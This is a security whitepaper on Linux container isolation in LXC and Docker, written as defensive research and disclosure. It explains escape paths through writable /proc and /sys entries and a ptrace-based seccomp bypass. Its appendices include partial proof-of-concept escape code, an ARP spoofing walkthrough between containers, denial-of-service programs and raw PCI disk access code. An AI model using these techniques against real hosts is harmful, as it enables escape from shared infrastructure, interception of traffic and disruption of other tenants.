Container Whitepaper
Container Whitepaper
Prepared by:
Jesse Hertz
Namespaces
Many Linux namespace features were designed with the goal of making container systems
useable and secure [1] [2]. The kernel provides a number of namespaces [3] that form the core of
modern containerization systems:
IPC Provides namespaced versions of SystemV IPC and POSIX message queues.
While keeping these IPC mechanisms isolated is important to secure processes
that use them, overall they won’t be particularly security relevant for the
purposes of this paper. A later section discusses “Denial of Service Attacks”
against these systems..
Network Provides a namespaced and isolated network stack. The majority of container
use-cases involve networked services, so this will prove to be a core feature of
containers. The section “NET_RAW abuse” will explore exploiting typical flaws
in container networking.
Mount Provides a namespaced view of mount points. Combined with the pivot_root(2)
[4] syscall, this will be used to isolate the container’s filesystem from the host’s
filesystem. The section “The Issue With open_by_handle_at()”, will go over a flaw
in this implementation, how it can be exploited, and how this exploitation is
prevented in modern container systems.
PID Provides a namespaced tree of process IDs (PIDs). This allows each container to
have a full isolated process tree, in which it has an ‘init’ process that it runs as PID
1 inside this namespace. Processes running in a container will have a different
PID on the host than they do inside the container’s PID namespace. A
vulnerability that impacts this namespace will be covered in “PID Namespacing
Info-Leak” later in this paper.
Cgroups Cgroups [9] (short for control groups) provide a hierarchical interface for
managing and metering resources and device access. Cgroups can be used by
higher privileged processes to put limits on lower privileged processes’
memory usage, CPU usage, and block device IO. They can also be used in
conjunction with iptables in order to provide traffic shaping. Most importantly,
they are used in container system to control access to devices [10] [11] [12].
Capabilities Linux capabilities [13] were introduced as a way to break the role of root down
into discrete subsections, which could be granted to non-root processes to
allow them to perform privileged actions. A process has a concept of a
“permitted set” of capabilities, which acts as a limiting superset for the
capabilities it can have. Importantly, and by default, this bounding set is carried
over to any child process, so the “init” process of the container creates a limiting
set of capabilities for all processes inside the container (as all processes
descend from PID 1). It is worth noting that, by default, Docker drops many
more capabilities [12] than LXC does [14] for privileged containers.
MAC Linux Security Modules (LSMs) [15] provide security hooks for Mandatory Access
Control (MAC) systems. AppArmor [16] is the most prevalent LSM in container
systems, and is the system this paper will discuss. AppArmor profiles can greatly
limit the actions that a given program can take, as well as take complex actions
on process-start (such as performing pivot_root()’s, and otherwise manipulating
the mount namespace). Both LXC and Docker ship, and enable by default,
profiles to establish essential security barriers and defense in depth (particularly
for privileged containers). Vulnerabilities that would be possible without
AppArmor (or with a weak profile) will be explored in the section “The
Importance of AppArmor”.
Seccomp Seccomp [19] is a mechanism for system call filtering. Seccomp policies come in
two versions. In version one, a filter is a small set of allowed system calls which
cannot be customized, this is also referred to as the “Strict” mode. In version
two, “Filter mode”, system call filters are written as Berkeley Packet
Filter (BPF) programs. This allows more finely-grained policies to be set on
system call usage (with some caveats, seccomp-bpf filters can inspect syscall
arguments, but cannot dereference pointers [19]).
LXC currently uses a relatively simple policy [20], while the 1.10 release of
Docker has introduced support for seccomp-bpf , as well as providing a fairly
comprehensive example filter [21]. Note that on Docker 1.10, seccomp is not
used by default on trusty (somewhat confusingly, when using Docker 1.10 on
Ubuntu 15.10, seccomp is used by default). However, as of Docker 1.11.1,
seccomp is now used by default on trusty as well.
The section “The ptrace(2) Hole” will discuss bypassing seccomp.
By examining segments of the AppArmor policy in use by LXC, several “historical” (or theoretical)
container breakouts can be understood, providing insight into the need for AppArmor (for the full
policies, see [22] for LXC, and [23] for Docker).
Docker blocks many of these attacks by mounting /sys and parts of /proc as read-only filesystems,
rather than (or in addition to) using AppArmor. Note that with the addition of user namespaces,
some of these policies have become defense-in-depth measures, as kernel namespaces should
prevent the actions without the presence of AppArmor (as long as the container has limited
capabilities in the root user namespace).
Mount Options
First up are the AppArmor policies to block access to mounting devpts filesystems. As the
comment below states, without this the container could remount /dev/pts and get access to the
host’s terminals.
Next are policies to stop the container from attempting to remount the root filesystem. This is
mainly done as a defense-in-depth measure.
Utility Changes
There are a number of dangerous places in /proc and /sys that allow trivial container escapes. All
of the following involve changing the location of a utility (such as modprobe) that the host will call
when certain events happen (such as a kernel module load request). By changing this to point to a
program within our container, an attacker can then cause the host to run an arbitrary piece of
code outside the container.
LXC uses the following ruleset to block these attacks. Note this is not an AppArmor profile, it is the
input to a small python script [24] which generates a long portion of AppArmor rules. The full
profile generated by this is at [25].
block /sys
allow /sys/fs/cgroup/**
allow /sys/devices/virtual/net/**
allow /sys/class/net/**
block /proc/sys
allow /proc/sys/kernel/shm*
allow /proc/sys/kernel/sem*
allow /proc/sys/kernel/msg*
allow /proc/sys/kernel/hostname
allow /proc/sys/kernel/domainname
allow /proc/sys/net/**
• uevent_helper: uevents are events triggered by the kernel when a device is added or
removed [26]. Notably, the path for the “uevent_helper” can be modified by writing to
“/sys/kernel/uevent_helper”. Then, when a uevent is triggered (which can also be done from
userland by writing to files such as “/sys/class/mem/null/event”), the malicious uevent_helper
gets executed. A nice write-up with example code is available online [27].
• modprobe: modprobe [28] is a userland utility invoked when the kernel needs to load a
kernel module. Its location can be changed by modifying “/proc/sys/kernel/modprobe” [29],
and then code execution can be gained by performing any action which will trigger the kernel
to attempt to load a kernel module (such as using the crypto-API to load a currently unloaded
crypto-module, or using ifconfig to load a networking module for a device not currently used).
• core_pattern: core_patterns are usually used to tell the kernel how to name and format the
core dumps that are produced when a program crashes. However, they contain a terrific
feature [30]: “Since kernel 2.6.19, Linux supports an alternate syntax for the
/proc/sys/kernel/core_pattern file. If the first character of this file is a pipe symbol (|), then the
remainder of the line is interpreted as a program to be executed. Instead of being written to a
disk file, the core dump is given as standard input to the program.” Using this, a core_pattern
can be specified that invokes a program of our choice, and then to trigger its usage, you only
need to have a program crash.
Dangerous Paths
• kcore: kcore provides a full dump of the physical memory of the system in the core file format
[31]. It does not allow writing to said memory. Access to this allows a container to trivially read
all of host memory.
• kmem: /proc/kmem is an alternate interface for /dev/kmem [32] (direct access to which is
blocked by the cgroup device whitelist), which is a character device file representing kernel
virtual memory. It allows both reading and writing, allowing direct modification of kernel
memory.
• mem: /proc/mem is an alternate interface for /dev/mem [32] (direct access to which is
blocked by the cgroup device whitelist), which is a character device file representing physical
memory of the system. It allows both reading and writing, allowing modification of all memory.
(It requires slightly more finesse than kmem, as virtual addresses need to be resolved to
physical addresses first).
• sysrq-trigger: Writing to this special file allows sending System Request Key commands [33],
which allow a number of privileged actions, such as killing processes, listing all processes on
the system, or triggering host reboot [34].
The final important section blocks writes to several different places which could be dangerous:
• debugfs: debugfs provides a “no rules” interface by which the kernel (or kernel modules) can
create debugging interfaces accessible to userland [35]. It has had a number of security issues
in the past [36], and the “no rules” guidelines behind the filesystem have often clashed with
security constraints [37]. Inside an LXC container, it is mounted read-only.
• /sys/firmware/efi/efivars: efivars provides an interface to write to the NVRAM used for UEFI
boot arguments [38]. Modifying them can render the host machine unbootable (and has in
some recent systems [39] .
• /sys/kernel/security: Mounted here is the securityfs interface, which allows configuration of
Linux Security Modules [40]. Most relevant for our purposes, this allows configuration of
AppArmor policies [41], and so access to this may allow a container to disable its MAC system.
• /proc/sys/fs: From the RedHat manpages [42]: “This directory contains an array of options
and information concerning various aspects of the file system, including quota, file handle,
inode, and dentry information.” Write access to this directory would allow various denial-of-
service attacks against the host.
2
blacklist
reject_force_umount # comment this to allow umount -f; not recommended
[all]
kexec_load errno 1
open_by_handle_at errno 1
init_module errno 1
finit_module errno 1
delete_module errno 1
The first piece of the LXC policy is intended as a defense in depth measure to stop containers
from forcibly unmounting pieces of their filesystem, which may have security consequences. The
more interesting section is the blacklisting of certain dangerous syscalls:
Kernel Manipulation
Several system calls which allow manipulating kernel modules are banned (init_module(2),
finit_module(2), and delete_module(2) ), as well as kexec_load(2), which allows replacing the
currently running kernel with a new kernel image. Note that there is some defense in depth
against exploiting these in privileged containers:
• init_module(2) [43], finit_module(2) [44] and delete_module(2) [45]: These all require the
SYS_MODULE capability, which is dropped by Docker and LXC in privileged containers.
• kexec_load(2) [46]: kexec_load(2) does not require SYS_MODULE. Instead, it requires
SYS_BOOT, which privileged LXC containers retain. In most situations, this isn’t exploitable
(without bypassing seccomp), however it is worth noting Linux 3.17 introduced a new kexec
variant: kexec_file_load(2) [46]. This call (meant for loading signed kernels) is not on the
seccomp blacklist for a privileged LXC container, and only requires SYS_BOOT. However,
privileged LXC containers have a number of other issues allowing reliable container escape
without needing to boot into a new kernel (since we can in fact bypass seccomp! For the
eager reader, feel free to head right to ‘The ptrace(2) Hole’ and ‘Appendix: Privileged LXC
Escape PoC’).
From within a container, it is possible to access the “control regions” of devices attached to the
host PCI bus by using the /proc/bus/pci/ interface. Access to this /proc/ interface requires the
SYS_RAWIO capability. Even if this path in /proc was blocked through AppArmor, a container
with SYS_RAWIO could still access this interface through the iopl(2)/ioperm(2) syscalls (and then
using inb(2), outb(2) and friends [52] [53] to access the IO ports). Note that Docker is not
vulnerable to this, since (aside from limited portions), /proc is typically mounted read-only, and
SYS_RAWIO is dropped. For proof of concept code using this to send raw AHCI commands to the
hard-disk, see Appendix: /proc/bus/pci .
In the response to this bug, the LXC team commented that they consider LXC privileged
containers inherently unsafe, as there is a known and “unfixable” hole in LXC’s privileged
containers, involving ptrace(2) to bypass seccomp (also a known seccomp limitation, as discussed
below).
The seccomp check will not be run again after the tracer is
notified. (This means that seccomp-based sandboxes MUST NOT
allow use of ptrace, even of other sandboxed processes, without
extreme care; ptracers can use this mechanism to escape.)
Despite LXC privileged containers being inherently unsafe, in this author’s opinion, finding
privileged container breakouts can be a fun exercise (and often they can make privileged
containers slightly more safe: e.g. after reporting the /proc/bus/ issue, new AppArmor rules were
added and RAW_SYSIO was dropped by default). So to any interested readers, go forth and hunt!
I’d love to hear about what you find.
The following section covers some known weaknesses in unprivileged containers, along with
demonstrations on how they can be exploited. The following tests were performed on a default
Docker 1.10 setup [57] (which, on trusty, does not use user namespaces or seccomp by default),
as well as on a default LXC 1.08 setup [58] (which does use both user namespaces and seccomp
by default) on a default Vagrant Ubuntu Trusty64 VM. While Docker containers started this way
are not unprivileged, all the following attacks were found on an unprivileged LXC container, and
then verified to work in (default, privileged) Docker as well.
While the next two issues have been documented before by other researchers, they represent
subtly insecure defaults with large impacts, and so the author believes they merit further
discussion. On a positive note, in response to disclosing these issues to the LXC team, they will be
updating their security page to mention these issues [60], which should hopefully bring them to
the attention of more developers and administrators using LXC.
NET_RAW abuse
A common configuration for companies offering PaaS solutions built on containers is to have
multiple customers’ containers running on the same physical host. By default, both LXC and
Docker setup container networking so that all containers share the same Linux virtual bridge.
These containers will be able to communicate with each other. Even if this direct network access is
disabled (using the –icc=false flag for Docker, or using iptables rules for LXC), containers aren’t
restricted for link-layer traffic. In particular, it is possible (and in fact quite easy) to conduct an ARP
spoofing attack on another container within the same host system, allowing full middle-person
attacks of the targeted container’s traffic. A full walkthrough of this attack is present in “Appendix:
Cross-Container ARP Spoofing Walkthrough”. The author reported this issue to both LXC and
Docker [61] [62] . As referenced in the responses to the bug report, this is not a particularly new
issue. It has been documented in both LXC [63] [64] [65] and Docker [66] [67] [68], as well as in
other products such as OpenSwitch [69], and in OpenStack Neutron, where it was previously an
issue [70] and then fixed [71]. The LXC team recommends a number of solutions [61], including:
• Using LXD with OpenStack to manage container networking
• Using libvirt to manage the MAC tables of bridges/containers
Forgoing ulimits, two other DoS conditions are often exploitable in container systems:
• Disk Space: Perhaps (aside from a fork bomb) the simplest DoS against container systems
is to fill up disk space. From testing, this worked on LXC and Docker. Unlike some of the
other DoS attacks presented here, which may often bring down the host or introduce
enough instability to make themselves difficult to clean up, this one offers the simplest
ability to create a DoS and then clean it up quickly. Combined with the PID Namespacing
Info-Leak, this could allow an attacker container to target other tenants on a shared host,
selectively creating DoS conditions only when certain other containers or processes were
running.
• Global File Descriptor Limits: The system maintains a limit on the maximum number of
file descriptors available overall (available at /proc/sys/fs/file-max, which as was discussed
earlier, containers cannot write to). If containers are not sharing a UID map, and have a
ulimit set on the number of file descriptors they can open, a container can still attempt to
DoS the host (and other containers) by opening the maximum number of FDs allowed as
each user in its user namespace, providing a greatly amplified ability to consume FDs.
This is generally a “last line” DoS, and would only be attempted if mitigations for other
(simpler) vectors are put in place.
Acknowledgements
I’d like to thank Tim Newsham for the code in Appendix: Privileged LXC Escape PoC, Aaron
Adams for code Appendix: /proc/bus/pci , Aaron Grattafiori for his help with reviewing content,
Jeff Dileo for pointing out how to combine DoS and Infoleaks to cause great havoc, and Jake
Heath, Jack Leadford, Justin Engler, and Jeremiah Blatz for their (heroic) efforts in copyediting my
brain mush into a coherent paper.
Appendix Code
As many of the appendices contain long code segments, all code in the appendices has been
packaged in a separate tarball for the reader’s convenience, available here: XXX.
Further Reading
I highly recommend the following (in no particular order) for both understanding containers and
container security:
• http://www.slideshare.net/jpetazzo/anatomy-of-a-container-namespaces-cgroups-some-
filesystem-magic-linuxcon
• https://lwn.net/Articles/531114/
• http://www.haifux.org/lectures/299/netLec7.pdf
• https://www.stgraber.org/2013/12/20/lxc-1-0-blog-post-series/
• https://major.io/wp-content/uploads/2015/08/Securing-Linux-Containers-GCUX-Gold-
Paper-Major-Hayden.pdf
• http://arxiv.org/pdf/1501.02967.pdf
• https://www.nccgroup.trust/globalassets/our-
research/us/whitepapers/2016/april/ncc_group_understanding_hardening_linux_contain
ers-10pdf
[1] https://lwn.net/Articles/531114/.
[2] https://lwn.net/Articles/524952/.
[3] http://man7.org/linux/man-pages/man7/namespaces.7.html.
[4] https://deis.com/blog/2015/isolation-linux-containers.
[5] http://lwn.net/Articles/543273/.
[6] https://medium.com/@ewindisch/linux-user-namespaces-might-not-be-secure-enough-a-k-
a-subverting-posix-capabilities-f1c4ae19cad#.tboeuds6z.
[7] https://linuxcontainers.org/lxc/security/.
[8] https://blog.docker.com/2016/02/docker-engine-1-10-security/.
[9] https://access.redhat.com/documentation/en-
US/Red_Hat_Enterprise_Linux/6/html/Resource_Management_Guide/ch01.html.
[10] http://www.slideshare.net/jpetazzo/anatomy-of-a-container-namespaces-cgroups-some-
filesystem-magic-linuxcon.
[11] https://github.com/lxc/lxc/blob/master/config/templates/common.conf.in#L21.
[12] https://github.com/opencontainers/runc/blob/master/libcontainer/SPEC.md.
[13] http://man7.org/linux/man-pages/man7/capabilities.7.html.
[14] https://github.com/lxc/lxc/blob/master/config/templates/common.conf.in#L13.
[15] https://www.kernel.org/doc/Documentation/security/LSM.txt.
[16] https://wiki.ubuntu.com/AppArmor.
[17] http://man7.org/linux/man-pages/man5/lxc.container.conf.5.html.
[18] https://docs.docker.com/engine/security/security.
[19] https://www.kernel.org/doc/Documentation/prctl/seccomp_filter.txt.
[20] https://github.com/lxc/lxc/blob/master/config/templates/common.seccomp.
[21] https://github.com/jfrazelle/docker/blob/d34bbb66d5d5f2f07b8f0c1b63df5f058f20b436/d
aemon/execdriver/native/seccomp_default.go.
[22] https://github.com/lxc/lxc/blob/master/config/apparmor/abstractions/container-base.
[23] https://github.com/docker/docker/blob/master/profiles/apparmor/template.go.
[24] https://github.com/lxc/lxc/blob/master/config/apparmor/lxc-generate-aa-rules.py.
[25] https://github.com/lxc/lxc/blob/master/config/apparmor/container-rules.
[26] http://www.mpipks-dresden.mpg.de/~mueller/docs/suse10.1/suselinux-
manual_en/manual/sec.udev.kernel.html.
[27] http://blog.bofh.it/debian/id_413.
[28] http://linux.die.net/man/8/modprobe.
[29] http://kaivanov.blogspot.com/2010/09/all-you-need-to-know-about-procsys.html.
[30] http://man7.org/linux/man-pages/man5/core.5.html).
The following code demonstrates how ptrace(2) can be used to bypass seccomp. This allows
using open_by_handle_at(2), which allows escaping from a privileged container. While this
technique can still be used to disable seccomp inside unprivileged LXC containers, a security
check in the open_by_handle_at(2) system call will fail, due to the use of the `capable()` macro [79],
which performs capability checks against the root user namespace [80]. This entire seccomp
bypass vector is blocked by Docker by disallowing ptrace(2) inside containers:
/*
* @author Tim Newsham
* use ptrace to bypass seccomp rule against open_handle_at
* and use open_handle_at to get a handle on the REAL root dir
* and then chroot to it. This escapes privileged lxc container.
* gcc -g -Wall secopenchroot.c -o secopenchroot
* ./secopenchroot /tmp "02 00 00 00 00 00 00 00"
*
* assuming that the real root has file handle "02 00 00 00 00 00 00 00"
*/
#include <stdio.h>
#include <stdlib.h>
#include <syscall.h>
#include <errno.h>
#include <sys/signal.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <linux/kexec.h>
#include <sys/user.h>
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#define _GNU_SOURCE
#define __USE_GNU
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
n = 0;
while(*p) {
fp->handle_type = 1;
n = getDat(dat, fp->f_handle);
if(n == -1) {
printf("bad data!\n");
exit(1);
}
fp->handle_bytes = n;
mfd = open(fn, 0);
if(mfd == -1) {
perror(fn);
exit(1);
}
if(argc != 3) {
printf("bad usage\n");
exit(1);
}
switch((pid = fork())) {
case -1: perror("fork"); exit(1);
/*
* note: we wont get a syscall-enter-stop for any
* seccomp filtered syscalls, just the syscall-exit-stop.
*/
if(regs.rax != -ENOSYS) /* not a syscall-enter-stop ! */
continue;
if(regs.orig_rax == SYS_getpid) {
regs.orig_rax = regs.rdi;
regs.rdi = regs.rsi;
regs.rsi = regs.rdx;
regs.rdx = regs.r10;
regs.r10 = regs.r8;
regs.r8 = regs.r9;
regs.r9 = 0;
printf("syscallX %llu, before tampering\n", regs.orig_rax); dumpregs(pid);
ptrace(PTRACE_SETREGS, pid, NULL, ®s);
printf("after tampering\n");dumpregs(pid);
}
//printf("before\n");dumpregs(pid);
The following was performed on a default LXC installation [58], and reported to LXC and Docker
with a full write-up and reproduction, which was made public by the LXC team [61]. This
reproduction is for an LXC system, but it can easily be adapted to a Docker system instead.
# from now on, all commands will have the full command prompt to make it clear
# where they are being run
# in this case, 10.0.3.159 is container B's eth0, and 10.0.3.246 is container A's eth0
# since the two containers are on the same subnet, it may appear that they can
# sniff each other's traffic. so . . .
# a quick demonstration that you cannot normally sniff traffic on the wire
# just by virtue of being on the same subnet:
# in container A
root@a:/# tcpdump -i any -vv -n dst host 10.0.3.159
# in container B
root@b:/# nc -lv 8888
# now, we will demonstrate the ability to sniff traffic with ARP spoofing
# in container A:
# install dsniff
apt-get update
apt-get install dsniff
# look at the ARP tables on the host and note that both 10.0.3.159 and 10.0.3.246
# both now point at the MAC address for container A:
root@vagrant-ubuntu-trusty-64:~# arp -a
? (10.0.2.2) at 52:54:00:12:35:02 [ether] on eth0
? (10.0.3.159) at e6:ad:42:7a:f1:54 [ether] on lxcbr0
? (10.0.3.246) at e6:ad:42:7a:f1:54 [ether] on lxcbr0
# Finally, we can try to send some traffic from the host to container B,
# and sniff it from container A
# in B
root@b:/# nc -lv 8888
# in A:
root@a:/# apt-get install tcpdump
root@a:/# tcpdump -i any -vv -n dst host 10.0.3.159
# on the host
root@vagrant-ubuntu-trusty-64:~# nc 10.0.3.159 8888
It is built with `gcc mq.c -lrt`, and then run with `./a.out`. Run this program in one container until it
has used all available resources (which will lead it to exit with: `mq_open(): Too many open files`).
Then, inside a second container, run the same program, and observe that it immediately errors
out without successfully creating one message queue.
/* @author jhertz
* based off code found at:
* https://users.pja.edu.pl/~jms/qnx/help/watcom/clibref/mq_overview.html
*/
#include <mqueue.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
void main () {
mqd_t mqdes; // Message queue descriptors
unsigned int prio; // Priority
char biggest[8192]; // based on a ulimit –q of 819200
int i;
const char* ptr = (const char*) biggest;
for(i=0; ; i++) {
sprintf(biggest, "/%d", i);
printf("going to open mq: %s\n", biggest);
mqdes = mq_open (biggest, O_RDWR | O_CREAT, O_RDWR, NULL);
if(mqdes == -1) {
perror("mq_open()");
return;
}
Pending Signals
To queue up the maximum number of pending signals, a short C program which blocks all signals
can be used:
int main(void){
pthread_t thread;
sigset_t set;
int s;
The above can be built with `gcc -lpthread signal.c -o signal` and then run as `./signal`. Once
running, the maximum number of signals can be queued using a simple bash one-liner: `'for i in
{1..3752}; do kill -64 <pid>; done'` where `<pid>` is the pid of the `signal` program, and 3752 was
the maximum number of pending signals allowed by ulimit.
Max Processes
This is always one of my favorite denial-of-service attacks, because of how simple the “exploit” is
versus just how large an impact it can have. Even without trivial fork bombs, a sequential-forker of:
in an LXC container was enough to get my Vagrant VM to close all my SSH sessions, and needed
to be vagrant halt --forced. This did not destabilize the host VM on Docker.
Max Files
To use up all available file descriptors (FDs), the following short C program can be used:
int main(void){
printf("stalling\n");
for(;;)
;
}
It can be compiled with `gcc file.c –o file` and run with `./file`. On Docker, this creates a simple and
effective DoS against other Docker containers. On LXC, the ulimits per container were set lower,
was enough to cause a denial of service to other LXC containers. Exploiting the global file
descriptor limit follows along the same lines as the previous exploit, and is possible even when
containers do not share UID maps. In such a case where UID maps are non-shared, and containers
have a max-FD ulimit placed on each of their users, they can attempt to exhaust FDs by running
the above code as each user in their user namespace.
where 18G is big enough to fill up the hard disk. Docker doesn’t allow fallocate, so slightly more
creativity is needed. dd proved ineffective when trying this attack, and so the the following script
was written as a PoC:
#!/usr/bin/env python
# @author jhertz
# quick and dirty script to make a big file (~18 gigs)
# this is far from the most efficient way to do this
with open("big_file", "w") as f:
for i in xrange(1, 1024 * 18):
f.write("B" * 1024 * 1024)
f.flush()
f.close()
This proof of concept is meant to demonstrate the ability to circumvent an LXC privileged
container’s “security boundary” by communicating with underlying hardware directly.
Environment
• The test environment for this one was a VMWare workstation [84] VM running
Ubuntu trusty64. The primary disk was a SCSI disc, but a secondary target 1GB SATAdisk
was added, with no special settings (write caching was enabled by default).
• Communication is possible regardless of the mount state of the drive.
• A default LXC privileged environment was created using the instructions at [58].
• As the root user in the LxC container, lspci –vv was used to get the
information about the target AHCI device:
• To demonstrate the vulnerability, compile and execute the attached tool (pciread.c), and
then run it within the container. In this example, the invocation and output was:
#./pciread -b 02 -d 05 -f 0 -a 0xfd5ee000 -p 1
bar: fd5ee000 bus: 02 device: 05 function: 0
opened /proc/bus/pci/02/05.0
mapping 1 pages of size: 4096
AHCI 0001.0300 32 slots 30 ports 6 Gbps 0x3fffffff impl
• The hexdump output shows the ATA IDENTIFY command response sent back
from the controller.
• There are some assumptions the code makes. It assumes the drive it is
going to talk to is the first device it finds in the AHCI port list
that is actually active.
• Also it doesn't cleanly recover everything after getting the response,
so the state of the mapped registers is wrong and the kernel won't be
able to mount the device afterwards or anything.
Explanation of PoC
While reading the attached code is instructive, here is an overview of the methodology used:
• Map the control region of the AHCI device into memory through the /proc/bus/pci/
interface using open(), mmap(), and ioctl().
• Allocate several buffers, and determine their logical address using /proc/self/pagemap.
• Disable interrupts for the device.
• Find the port the drive is attached to.
• Set the FIS, Command, and Command List pointers on the device to the previously
allocated buffers.
• Create a H2D FIS (to tell the drive to identify itself), a command to wrap the FIS (telling the
drive to use a DMA buffer we have allocated), and a command list structure containing the
command.
• Copy all of these to the previously allocated buffers, which the device also now has
pointers to.
• Flip the start bit on the device to cause it process commands from the command list.
• Sleep for a second, then spin loop until the drive has processed tthe command.
• The drive has now executed our command (ATA_CMD_ID_ATA, which is the drive
identification command), and written the result to a buffer we allocated. Print it out, and
attempt (poorly) to restore the drive's state.
/*
* LxC PCI Device Access Through /proc/ PoC
* Sample code to map in PCI memory for a specified AHCI device and
* tell the device to identify itself.
* “vulnerability” discovered by jhertz
* PoC written by aaron adams
*/
#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <getopt.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <linux/pci.h>
#include <linux/limits.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
int open_pmap(void)
{
int fd;
int rc;
char *pmap;
free(pmap);
return fd;
}
p = buf;
n = sprintf(p, "\n");
p += n;
if (i != size) {
n = sprintf(p, "%.02x ", *addr & 0xff);
p += n;
addr = (char *)((unsigned long)addr +1);
// FIS_TYPE_REG_H2D
struct host_to_dev_fis {
unsigned char type;
unsigned char opts;
unsigned char command;
unsigned char features;
union {
unsigned char lba_low;
unsigned char sector;
};
union {
unsigned char lba_mid;
unsigned char cyl_low;
};
union {
unsigned char lba_hi;
unsigned char cyl_hi;
};
union {
unsigned char device;
unsigned char head;
};
union {
unsigned char lba_low_ex;
unsigned char sector_ex;
};
union {
unsigned char lba_mid_ex;
unsigned char cyl_low_ex;
};
union {
unsigned char lba_hi_ex;
unsigned char cyl_hi_ex;
};
unsigned char features_ex;
// FIS_TYPE_DMA_SETUP
struct dma_setup_fis {
unsigned char type;
unsigned char opts;
unsigned short reserved;
uint64_t dma_id;
uint32_t rsvd1;
uint32_t dma_offset;
uint32_t transfer_count;
uint32_t rsvd2;
};
/* Command header structure. These entries are in what the spec calls the
* 'command list' */
struct cmd_hdr {
/*
* Command options.
* - Bits 31:16 Number of PRD entries.
* - Bits 15:8 Unused in this implementation.
* - Bit 7 Prefetch bit, informs the drive to prefetch PRD entries.
* - Bit 6 Write bit, should be set when writing data to the device.
* - Bit 5 Unused in this implementation.
* - Bits 4:0 Length of the command FIS in DWords (DWord = 4 bytes).
*/
unsigned int opts;
/* This field is unused when using NCQ. */
union {
unsigned int byte_count;
unsigned int status;
};
unsigned int ctba; // 128-byte aligned command table addr
unsigned int ctbau; // upper addr bits if 64-bit is used
unsigned int res[4];
};
typedef enum
enum {
ATA_ID_WORDS = 256,
ATA_CMD_ID_ATA = 0xEC
};
/* HOST_CTL bits */
HOST_RESET = (1 << 0), /* reset controller; self-clear */
HOST_IRQ_EN = (1 << 1), /* global IRQ enable */
HOST_MRSM = (1 << 2), /* MSI Revert to Single Message */
HOST_AHCI_EN = (1 << 31), /* AHCI enabled */
/* HOST_CAP bits */
HOST_CAP_SXS = (1 << 5), /* Supports External SATA */
HOST_CAP_EMS = (1 << 6), /* Enclosure Management support */
HOST_CAP_CCC = (1 << 7), /* Command Completion Coalescing */
HOST_CAP_PART = (1 << 13), /* Partial state capable */
HOST_CAP_SSC = (1 << 14), /* Slumber state capable */
HOST_CAP_PIO_MULTI = (1 << 15), /* PIO multiple DRQ support */
HOST_CAP_FBS = (1 << 16), /* FIS-based switching support */
HOST_CAP_PMP = (1 << 17), /* Port Multiplier support */
HOST_CAP_ONLY = (1 << 18), /* Supports AHCI mode only */
HOST_CAP_CLO = (1 << 24), /* Command List Override support */
HOST_CAP_LED = (1 << 25), /* Supports activity LED */
HOST_CAP_ALPM = (1 << 26), /* Aggressive Link PM support */
HOST_CAP_SSS = (1 << 27), /* Staggered Spin-up */
HOST_CAP_MPS = (1 << 28), /* Mechanical presence switch */
HOST_CAP_SNTF = (1 << 29), /* SNotification register */
HOST_CAP_NCQ = (1 << 30), /* Native Command Queueing */
HOST_CAP_64 = (1 << 31), /* PCI DAC (64-bit DMA) support */
/* HOST_CAP2 bits */
HOST_CAP2_BOH = (1 << 0), /* BIOS/OS handoff supported */
HOST_CAP2_NVMHCI = (1 << 1), /* NVMHCI supported */
HOST_CAP2_APST = (1 << 2), /* Automatic partial to slumber */
HOST_CAP2_SDS = (1 << 3), /* Support device sleep */
HOST_CAP2_SADM = (1 << 4), /* Support aggressive DevSlp */
HOST_CAP2_DESO = (1 << 5), /* DevSlp from slumber only */
/* PORT_IRQ_{STAT,MASK} bits */
PORT_IRQ_COLD_PRES = (1 << 31), /* cold presence detect */
PORT_IRQ_TF_ERR = (1 << 30), /* task file error */
PORT_IRQ_HBUS_ERR = (1 << 29), /* host bus fatal error */
PORT_IRQ_HBUS_DATA_ERR = (1 << 28), /* host bus data error */
PORT_IRQ_IF_ERR = (1 << 27), /* interface fatal error */
PORT_IRQ_IF_NONFATAL = (1 << 26), /* interface non-fatal error */
PORT_IRQ_OVERFLOW = (1 << 24), /* xfer exhausted available S/G */
PORT_IRQ_BAD_PMP = (1 << 23), /* incorrect port multiplier */
PORT_IRQ_FREEZE = PORT_IRQ_HBUS_ERR |
PORT_IRQ_IF_ERR | PORT_IRQ_CONNECT |
PORT_IRQ_PHYRDY | PORT_IRQ_UNK_FIS |
PORT_IRQ_BAD_PMP,
PORT_IRQ_ERROR = PORT_IRQ_FREEZE |
PORT_IRQ_TF_ERR | PORT_IRQ_HBUS_DATA_ERR,
DEF_PORT_IRQ = PORT_IRQ_ERROR | PORT_IRQ_SG_DONE |
PORT_IRQ_SDB_FIS | PORT_IRQ_DMAS_FIS |
PORT_IRQ_PIOS_FIS | PORT_IRQ_D2H_REG_FIS,
/* PORT_CMD bits */
PORT_CMD_ASP = (1 << 27), /* Aggressive Slumber/Partial */
/* PORT_FBS bits */
PORT_FBS_DWE_OFFSET = 16, /* FBS device with error offset */
PORT_FBS_ADO_OFFSET = 12, /* FBS active dev optimization offset */
PORT_FBS_DEV_OFFSET = 8, /* FBS device to issue offset */
PORT_FBS_DEV_MASK = (0xf << PORT_FBS_DEV_OFFSET), /* FBS.DEV */
PORT_FBS_SDE = (1 << 2), /* FBS single device error */
PORT_FBS_DEC = (1 << 1), /* FBS device error clear */
PORT_FBS_EN = (1 << 0), /* Enable FBS */
/* PORT_DEVSLP bits */
PORT_DEVSLP_DM_OFFSET = 25, /* DITO multiplier offset */
PORT_DEVSLP_DM_MASK = (0xf << 25), /* DITO multiplier mask */
PORT_DEVSLP_DITO_OFFSET = 15, /* DITO offset */
PORT_DEVSLP_MDAT_OFFSET = 10, /* Minimum assertion time */
PORT_DEVSLP_DETO_OFFSET = 2, /* DevSlp exit timeout */
PORT_DEVSLP_DSP = (1 << 1), /* DevSlp present */
PORT_DEVSLP_ADSE = (1 << 0), /* Aggressive DevSlp enable */
/* hpriv->flags bits */
/* ap->flags bits */
ICH_MAP = 0x90, /* ICH MAP register */
/* em constants */
EM_MAX_SLOTS = 8,
EM_MAX_RETRY = 5,
/* em_ctl bits */
EM_CTL_RST = (1 << 9), /* Reset */
